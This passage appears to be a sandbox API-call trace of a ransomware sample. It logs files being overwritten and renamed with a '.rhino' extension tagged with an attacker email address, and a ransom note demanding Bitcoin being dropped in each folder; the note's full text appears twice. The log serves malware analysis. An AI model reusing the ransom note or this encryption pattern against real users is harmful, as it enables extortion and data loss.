RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0085.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.997] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x0 [0085.997] CloseHandle (hObject=0xec) returned 1 [0085.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.007] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa [0086.007] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12a, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.007] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.008] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa, lpOverlapped=0x0) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.010] GetLastError () returned 0x0 [0086.010] SetLastError (dwErrCode=0x0) [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa) returned 0x6df110 [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.010] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0086.011] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12a) returned 0x75f208 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.011] WriteFile (in: hFile=0xec, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x12a, lpOverlapped=0x0) returned 1 [0086.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0086.011] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.011] CloseHandle (hObject=0xec) returned 1 [0086.012] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0086.012] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f208 [0086.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.012] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0086.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0086.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75ef78 [0086.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75f020 [0086.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75f0c8 [0086.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f020 | out: hHeap=0x6d0000) returned 1 [0086.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.019] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0086.019] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0086.021] CloseHandle (hObject=0xec) returned 1 [0086.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f0c8 | out: hHeap=0x6d0000) returned 1 [0086.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.022] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1517 [0086.022] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1637, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.022] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.022] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.030] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.030] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1517, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1517, lpOverlapped=0x0) returned 1 [0086.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.032] GetLastError () returned 0x0 [0086.032] SetLastError (dwErrCode=0x0) [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x153a) returned 0x75f020 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x760568 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x760670 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760568 | out: hHeap=0x6d0000) returned 1 [0086.032] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x760568 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x7607f8 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760568 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x760940 [0086.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7607f8 | out: hHeap=0x6d0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x760b28 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760940 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x760df8 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760b28 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x761230 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760df8 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7607f8 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761230 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x761160 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7607f8 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x761f78 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761160 | out: hHeap=0x6d0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7634b8 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761f78 | out: hHeap=0x6d0000) returned 1 [0086.034] WriteFile (in: hFile=0xec, lpBuffer=0x7634c0*, nNumberOfBytesToWrite=0x1637, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x7634c0*, lpNumberOfBytesWritten=0x2cfa04*=0x1637, lpOverlapped=0x0) returned 1 [0086.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7634b8 | out: hHeap=0x6d0000) returned 1 [0086.034] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1637, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.035] CloseHandle (hObject=0xec) returned 1 [0086.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x760568 [0086.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7607f8 [0086.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760568 | out: hHeap=0x6d0000) returned 1 [0086.036] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7607f8 | out: hHeap=0x6d0000) returned 1 [0086.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760670 | out: hHeap=0x6d0000) returned 1 [0086.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f020 | out: hHeap=0x6d0000) returned 1 [0086.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75f020 [0086.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75ef78 [0086.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75f0c8 [0086.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.092] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0086.092] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0086.093] CloseHandle (hObject=0xec) returned 1 [0086.093] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f0c8 | out: hHeap=0x6d0000) returned 1 [0086.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.094] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x3a5 [0086.094] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4c5, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.094] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.094] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.096] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.097] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x3a5, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x3a5, lpOverlapped=0x0) returned 1 [0086.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.097] GetLastError () returned 0x0 [0086.097] SetLastError (dwErrCode=0x0) [0086.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.097] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3a5) returned 0x75f0c8 [0086.098] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f478 [0086.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f580 [0086.098] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f478 | out: hHeap=0x6d0000) returned 1 [0086.098] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.098] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.100] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4c5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.100] CloseHandle (hObject=0xec) returned 1 [0086.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f478 [0086.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x75f708 [0086.101] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.108] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9467, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.108] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.108] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, 